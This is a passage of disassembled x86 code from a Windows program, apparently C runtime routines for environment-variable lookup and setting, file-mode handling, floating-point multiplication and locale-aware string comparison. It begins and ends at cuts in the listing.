sub_41FB6B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41FC98 proc near ; CODE XREF: sub_41FB6B+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_43AA68
cmp dword_43A9EC, edx
push esi
mov eax, offset dword_43A9E8
jz short loc_41FCC6
lea esi, [ecx+ecx*2]
lea esi, ds:43A9E8h[esi*4]
loc_41FCBA: ; CODE XREF: sub_41FC98+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41FCC6
cmp [eax+4], edx
jnz short loc_41FCBA
loc_41FCC6: ; CODE XREF: sub_41FC98+16�j
; sub_41FC98+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43A9E8h[ecx*4]
cmp eax, ecx
jnb short loc_41FCDA
cmp [eax+4], edx
jz short locret_41FCDC
loc_41FCDA: ; CODE XREF: sub_41FC98+3B�j
xor eax, eax
locret_41FCDC: ; CODE XREF: sub_41FC98+40�j
retn
sub_41FC98 endp
; =============== S U B R O U T I N E =======================================
sub_41FCDD proc near ; CODE XREF: sub_41EA02+23�p
arg_0 = dword ptr 4
cmp dword_46D170, 0
push ebx
push esi
mov esi, dword_46BB2C
push edi
jz short loc_41FD54
test esi, esi
jnz short loc_41FD0E
cmp dword_46BB34, esi
jz short loc_41FD54
call sub_4200AB
test eax, eax
jnz short loc_41FD54
mov esi, dword_46BB2C
test esi, esi
jz short loc_41FD54
loc_41FD0E: ; CODE XREF: sub_41FCDD+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_41FD54
push ebx
call sub_415B10
pop ecx
mov edi, eax
loc_41FD1F: ; CODE XREF: sub_41FCDD+6D�j
mov eax, [esi]
test eax, eax
jz short loc_41FD54
push eax
call sub_415B10
cmp eax, edi
pop ecx
jbe short loc_41FD47
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_41FD47
push edi
push ebx
push eax
call sub_42006C
add esp, 0Ch
test eax, eax
jz short loc_41FD4C
loc_41FD47: ; CODE XREF: sub_41FCDD+51�j
; sub_41FCDD+59�j
add esi, 4
jmp short loc_41FD1F
; ---------------------------------------------------------------------------
loc_41FD4C: ; CODE XREF: sub_41FCDD+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_41FD56
; ---------------------------------------------------------------------------
loc_41FD54: ; CODE XREF: sub_41FCDD+10�j
; sub_41FCDD+1C�j ...
xor eax, eax
loc_41FD56: ; CODE XREF: sub_41FCDD+75�j
pop edi
pop esi
pop ebx
retn
sub_41FCDD endp
; =============== S U B R O U T I N E =======================================
sub_41FD5A proc near ; CODE XREF: sub_41F120+8B�p
; sub_41F120+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_46CF20
jnb short loc_41FDC1
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_46CE20[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_41FDC1
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_41FD9A
and cl, 7Fh
jmp short loc_41FDA7
; ---------------------------------------------------------------------------
loc_41FD9A: ; CODE XREF: sub_41FD5A+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_41FDB5
or cl, 80h
loc_41FDA7: ; CODE XREF: sub_41FD5A+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41FDB5: ; CODE XREF: sub_41FD5A+48�j
mov dword_46BB04, 16h
jmp short loc_41FDCB
; ---------------------------------------------------------------------------
loc_41FDC1: ; CODE XREF: sub_41FD5A+B�j
; sub_41FD5A+27�j
mov dword_46BB04, 9
loc_41FDCB: ; CODE XREF: sub_41FD5A+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_41FD5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FDD0 proc near ; CODE XREF: sub_41F8D8+165�p
; sub_41FFF0+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_41FFD0
cmp cx, 7FFFh
jnb loc_41FFD0
cmp dx, 0BFFDh
ja loc_41FFD0
cmp dx, 3FBFh
ja short loc_41FE39
xor eax, eax
jmp short loc_41FE73
; ---------------------------------------------------------------------------
loc_41FE39: ; CODE XREF: sub_41FDD0+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_41FE5B
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_41FE5B
xor eax, eax
cmp [esi+4], eax
jnz short loc_41FE5D
cmp [esi], eax
jnz short loc_41FE5D
jmp loc_41FFCA
; ---------------------------------------------------------------------------
loc_41FE5B: ; CODE XREF: sub_41FDD0+71�j
; sub_41FDD0+79�j
xor eax, eax
loc_41FE5D: ; CODE XREF: sub_41FDD0+80�j
; sub_41FDD0+84�j
cmp cx, ax
jnz short loc_41FE80
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_41FE80
cmp [ebx+4], eax
jnz short loc_41FE80
cmp [ebx], eax
jnz short loc_41FE80
loc_41FE73: ; CODE XREF: sub_41FDD0+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_41FFEB
; ---------------------------------------------------------------------------
loc_41FE80: ; CODE XREF: sub_41FDD0+90�j
; sub_41FDD0+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_41FE90: ; CODE XREF: sub_41FDD0+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_41FEE4
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_41FEAC: ; CODE XREF: sub_41FDD0+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41F266
add esp, 0Ch
test eax, eax
jz short loc_41FED7
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_41FED7: ; CODE XREF: sub_41FDD0+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_41FEAC
loc_41FEE4: ; CODE XREF: sub_41FDD0+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_41FE90
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_41FF27
loc_41FF02: ; CODE XREF: sub_41FDD0+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_41FF20
lea eax, [ebp+var_24]
push eax
call sub_41F2E5
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_41FF02
loc_41FF20: ; CODE XREF: sub_41FDD0+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_41FF60
loc_41FF27: ; CODE XREF: sub_41FDD0+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_41FF60
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_41FF40: ; CODE XREF: sub_41FDD0+184�j
test byte ptr [ebp+var_24], 1
jz short loc_41FF49
inc [ebp+var_14]
loc_41FF49: ; CODE XREF: sub_41FDD0+174�j
lea eax, [ebp+var_24]
push eax
call sub_41F313
dec ebx
pop ecx
jnz short loc_41FF40
cmp [ebp+var_14], 0
jz short loc_41FF60
or byte ptr [ebp+var_24], 1
loc_41FF60: ; CODE XREF: sub_41FDD0+155�j
; sub_41FDD0+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_41FF77
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_41FFAC
loc_41FF77: ; CODE XREF: sub_41FDD0+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_41FFA9
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_41FFA4
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_41FF9E
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_41FFAC
; ---------------------------------------------------------------------------
loc_41FF9E: ; CODE XREF: sub_41FDD0+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_41FFAC
; ---------------------------------------------------------------------------
loc_41FFA4: ; CODE XREF: sub_41FDD0+1B5�j
inc [ebp+var_20+2]
jmp short loc_41FFAC
; ---------------------------------------------------------------------------
loc_41FFA9: ; CODE XREF: sub_41FDD0+1AB�j
inc [ebp+var_24+2]
loc_41FFAC: ; CODE XREF: sub_41FDD0+1A5�j
; sub_41FDD0+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_41FFD0
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_41FFCA: ; CODE XREF: sub_41FDD0+86�j
mov [esi+0Ah], ax
jmp short loc_41FFEB
; ---------------------------------------------------------------------------
loc_41FFD0: ; CODE XREF: sub_41FDD0+42�j
; sub_41FDD0+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_41FFEB: ; CODE XREF: sub_41FDD0+AB�j
; sub_41FDD0+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FDD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FFF0 proc near ; CODE XREF: sub_41F407+440�p
; sub_41F8D8+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_43AEE0
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_420069
jge short loc_420018
mov eax, [ebp+arg_4]
mov ebx, offset dword_43B040
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_420018: ; CODE XREF: sub_41FFF0+16�j
cmp [ebp+arg_8], ecx
jnz short loc_420023
mov eax, [ebp+arg_0]
mov [eax], cx
loc_420023: ; CODE XREF: sub_41FFF0+2B�j
cmp [ebp+arg_4], ecx
jz short loc_420069
push esi
push edi
loc_42002A: ; CODE XREF: sub_41FFF0+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_420062
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_420055
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_420055: ; CODE XREF: sub_41FFF0+57�j
push esi
push [ebp+arg_0]
call sub_41FDD0
pop ecx
pop ecx
xor ecx, ecx
loc_420062: ; CODE XREF: sub_41FFF0+49�j
cmp [ebp+arg_4], ecx
jnz short loc_42002A
pop edi
pop esi
loc_420069: ; CODE XREF: sub_41FFF0+14�j
; sub_41FFF0+36�j
pop ebx
leave
retn
sub_41FFF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42006C proc near ; CODE XREF: sub_41FCDD+5E�p
; sub_420548+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_420079
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420079: ; CODE XREF: sub_42006C+7�j
push dword_46CF24
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_46D144
call sub_420119
add esp, 1Ch
test eax, eax
jnz short loc_4200A6
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4200A6: ; CODE XREF: sub_42006C+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_42006C endp
; =============== S U B R O U T I N E =======================================
sub_4200AB proc near ; CODE XREF: sub_41FCDD+1E�p
; sub_4203C1+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_46BB34
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_42010C
mov ebx, dword_421138
loc_4200C4: ; CODE XREF: sub_4200AB+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_420114
push ebp
call sub_415BE9
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_420114
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_420114
push edi
push [esp+18h+var_4]
call sub_4203C1
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_4200C4
loc_42010C: ; CODE XREF: sub_4200AB+11�j
xor eax, eax
loc_42010E: ; CODE XREF: sub_4200AB+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420114: ; CODE XREF: sub_4200AB+29�j
; sub_4200AB+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_42010E
sub_4200AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420119 proc near ; CODE XREF: sub_42006C+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421C50
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_46BDF0, ebx
push 1
pop edi
jnz short loc_42018C
push edi
mov eax, offset dword_4218A0
push eax
push edi
push eax
push ebx
push ebx
call dword_421008 ; CompareStringW
test eax, eax
jz short loc_420169
mov dword_46BDF0, edi
jmp short loc_42018C
; ---------------------------------------------------------------------------
loc_420169: ; CODE XREF: sub_420119+46�j
push edi
mov eax, offset dword_43B668
push eax
push edi
push eax
push ebx
push ebx
call dword_42100C ; CompareStringA
test eax, eax
jz loc_420382
mov dword_46BDF0, 2
loc_42018C: ; CODE XREF: sub_420119+31�j
; sub_420119+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_4201A3
push esi
push [ebp+arg_8]
call sub_420396
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_4201A3: ; CODE XREF: sub_420119+78�j
cmp [ebp+arg_14], ebx
jle short loc_4201B8
push [ebp+arg_14]
push [ebp+arg_10]
call sub_420396
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_4201B8: ; CODE XREF: sub_420119+8D�j
mov eax, dword_46BDF0
cmp eax, 2
jnz short loc_4201DD
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42100C ; CompareStringA
jmp loc_420384
; ---------------------------------------------------------------------------
loc_4201DD: ; CODE XREF: sub_420119+A7�j
cmp eax, edi
jnz loc_420382
cmp [ebp+arg_18], ebx
jnz short loc_4201F2
mov eax, dword_46BBAC
mov [ebp+arg_18], eax
loc_4201F2: ; CODE XREF: sub_420119+CF�j
cmp esi, ebx
jz short loc_4201FF
cmp [ebp+arg_14], ebx
jnz loc_420297
loc_4201FF: ; CODE XREF: sub_420119+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_42020C
loc_420204: ; CODE XREF: sub_420119+13C�j
; sub_420119+16D�j
push 2
loc_420206: ; CODE XREF: sub_420119+146�j
pop eax
jmp loc_420384
; ---------------------------------------------------------------------------
loc_42020C: ; CODE XREF: sub_420119+E9�j
cmp [ebp+arg_14], edi
jle short loc_420218
loc_420211: ; CODE XREF: sub_420119+151�j
; sub_420119+159�j ...
mov eax, edi
jmp loc_420384
; ---------------------------------------------------------------------------
loc_420218: ; CODE XREF: sub_420119+F6�j
cmp esi, edi
jg short loc_42025D
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call dword_421198 ; GetCPInfo
test eax, eax
jz loc_420382
cmp esi, ebx
jle short loc_420261
cmp [ebp+var_3C], 2
jb short loc_42025D
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_42025D
loc_420243: ; CODE XREF: sub_420119+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_42025D
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_420257
cmp cl, dl
jbe short loc_420204
loc_420257: ; CODE XREF: sub_420119+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_420243
loc_42025D: ; CODE XREF: sub_420119+101�j
; sub_420119+120�j ...
push 3
jmp short loc_420206
; ---------------------------------------------------------------------------
loc_420261: ; CODE XREF: sub_420119+11A�j
cmp [ebp+arg_14], ebx
jle short loc_420297
cmp [ebp+var_3C], 2
jb short loc_420211
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_420211
loc_420274: ; CODE XREF: sub_420119+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_420211
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42028C
cmp cl, dl
jbe loc_420204
loc_42028C: ; CODE XREF: sub_420119+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_420274
jmp loc_420211
; ---------------------------------------------------------------------------
loc_420297: ; CODE XREF: sub_420119+E0�j
; sub_420119+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call dword_421064 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_420382
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_415B90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4202E6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_4202E6: ; CODE XREF: sub_420119+1B5�j
cmp [ebp+var_24], ebx
jz loc_420382
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_421064
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_420382
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_420382
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_415B90
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_420351
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_420351: ; CODE XREF: sub_420119+224�j
cmp edi, ebx
jz short loc_420382
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call dword_421064 ; MultiByteToWideChar
test eax, eax
jz short loc_420382
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_421008 ; CompareStringW
jmp short loc_420384
; ---------------------------------------------------------------------------
loc_420382: ; CODE XREF: sub_420119+63�j
; sub_420119+C6�j ...
xor eax, eax
loc_420384: ; CODE XREF: sub_420119+BF�j
; sub_420119+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_420119 endp
; =============== S U B R O U T I N E =======================================
sub_420396 proc near ; CODE XREF: sub_41C639+81�p
; sub_420119+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4203B3
loc_4203A6: ; CODE XREF: sub_420396+1B�j
cmp byte ptr [eax], 0
jz short loc_4203B3
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4203A6
loc_4203B3: ; CODE XREF: sub_420396+E�j
; sub_420396+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4203BE
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4203BE: ; CODE XREF: sub_420396+21�j
mov eax, edx
retn
sub_420396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4203C1 proc near ; CODE XREF: sub_4200AB+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_420425
push 3Dh
push [ebp+arg_0]
call sub_420607
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_420425
cmp [ebp+arg_0], esi
jz short loc_420425
mov eax, dword_46BB2C
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_46BB30
jnz short loc_42040B
push eax
call sub_4205A0
pop ecx
mov dword_46BB2C, eax
loc_42040B: ; CODE XREF: sub_4203C1+3C�j
cmp eax, edi
jnz short loc_420463
cmp [ebp+arg_4], edi
jz short loc_42042D
cmp dword_46BB34, edi
jz short loc_42042D
call sub_4200AB
test eax, eax
jz short loc_420463
loc_420425: ; CODE XREF: sub_4203C1+D�j
; sub_4203C1+22�j ...
or eax, 0FFFFFFFFh
loc_420428: ; CODE XREF: sub_4203C1+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42042D: ; CODE XREF: sub_4203C1+51�j
; sub_4203C1+59�j
cmp ebx, edi
jnz loc_420541
push 4
call sub_415BE9
cmp eax, edi
pop ecx
mov dword_46BB2C, eax
jz short loc_420425
mov [eax], edi
cmp dword_46BB34, edi
jnz short loc_420463
push 4
call sub_415BE9
cmp eax, edi
pop ecx
mov dword_46BB34, eax
jz short loc_420425
mov [eax], edi
loc_420463: ; CODE XREF: sub_4203C1+4C�j
; sub_4203C1+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_46BB2C
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_420548
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_4204C3
cmp dword ptr [edi], 0
jz short loc_4204C3
test ebx, ebx
jz short loc_4204BB
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_415C9B
pop ecx
loc_420495: ; CODE XREF: sub_4203C1+E2�j
cmp dword ptr [edi], 0
jz short loc_4204A5
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_420495
; ---------------------------------------------------------------------------
loc_4204A5: ; CODE XREF: sub_4203C1+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_41737F
pop ecx
test eax, eax
pop ecx
jz short loc_4204F5
jmp short loc_4204F0
; ---------------------------------------------------------------------------
loc_4204BB: ; CODE XREF: sub_4203C1+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_4204F5
; ---------------------------------------------------------------------------
loc_4204C3: ; CODE XREF: sub_4203C1+BD�j
; sub_4203C1+C2�j
test ebx, ebx
jnz short loc_420541
test esi, esi
jge short loc_4204CD
neg esi
loc_4204CD: ; CODE XREF: sub_4203C1+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_41737F
pop ecx
test eax, eax
pop ecx
jz loc_420425
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_4204F0: ; CODE XREF: sub_4203C1+F8�j
mov dword_46BB2C, eax
loc_4204F5: ; CODE XREF: sub_4203C1+F6�j
; sub_4203C1+100�j
cmp [ebp+arg_4], 0
jz short loc_420541
push [ebp+arg_0]
call sub_415B10
inc eax
inc eax
push eax
call sub_415BE9
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_420541
push [ebp+arg_0]
push esi
call sub_415A20
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call dword_421004 ; SetEnvironmentVariableA
push esi
call sub_415C9B
pop ecx
loc_420541: ; CODE XREF: sub_4203C1+6E�j
; sub_4203C1+104�j ...
xor eax, eax
jmp loc_420428
sub_4203C1 endp
; =============== S U B R O U T I N E =======================================
sub_420548 proc near ; CODE XREF: sub_4203C1+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_46BB2C
push edi
mov eax, [esi]
test eax, eax
jz short loc_420583
mov edi, [esp+8+arg_4]
loc_42055A: ; CODE XREF: sub_420548+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_42006C
add esp, 0Ch
test eax, eax
jnz short loc_420579
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_420593
test al, al
jz short loc_420593
loc_420579: ; CODE XREF: sub_420548+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_42055A
loc_420583: ; CODE XREF: sub_420548+C�j
mov eax, esi
sub eax, dword_46BB2C
sar eax, 2
neg eax
loc_420590: ; CODE XREF: sub_420548+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_420593: ; CODE XREF: sub_420548+2B�j
; sub_420548+2F�j
mov eax, esi
sub eax, dword_46BB2C
sar eax, 2
jmp short loc_420590
sub_420548 endp
; =============== S U B R O U T I N E =======================================
sub_4205A0 proc near ; CODE XREF: sub_4203C1+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_4205AF
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4205AF: ; CODE XREF: sub_4205A0+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_4205C1
loc_4205B7: ; CODE XREF: sub_4205A0+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_4205B7
loc_4205C1: ; CODE XREF: sub_4205A0+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_415BE9
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_4205E2
push 9
call sub_417C0E
pop ecx
loc_4205E2: ; CODE XREF: sub_4205A0+38�j
mov eax, [edi]
mov ebx, edi
loc_4205E6: ; CODE XREF: sub_4205A0+5B�j
test eax, eax
jz short loc_4205FD
push eax
add ebx, 4
call sub_42067A
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_4205E6
; ---------------------------------------------------------------------------
loc_4205FD: ; CODE XREF: sub_4205A0+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_4205A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420607 proc near ; CODE XREF: sub_4203C1+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_46CF3C, 0
jnz short loc_420622
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416F20
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420622: ; CODE XREF: sub_420607+A�j
mov ecx, [ebp+arg_0]
loc_420625: ; CODE XREF: sub_420607+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_420668
movzx edx, al
test byte_46D041[edx], 4
jz short loc_420654
mov dl, [ecx+1]
inc ecx
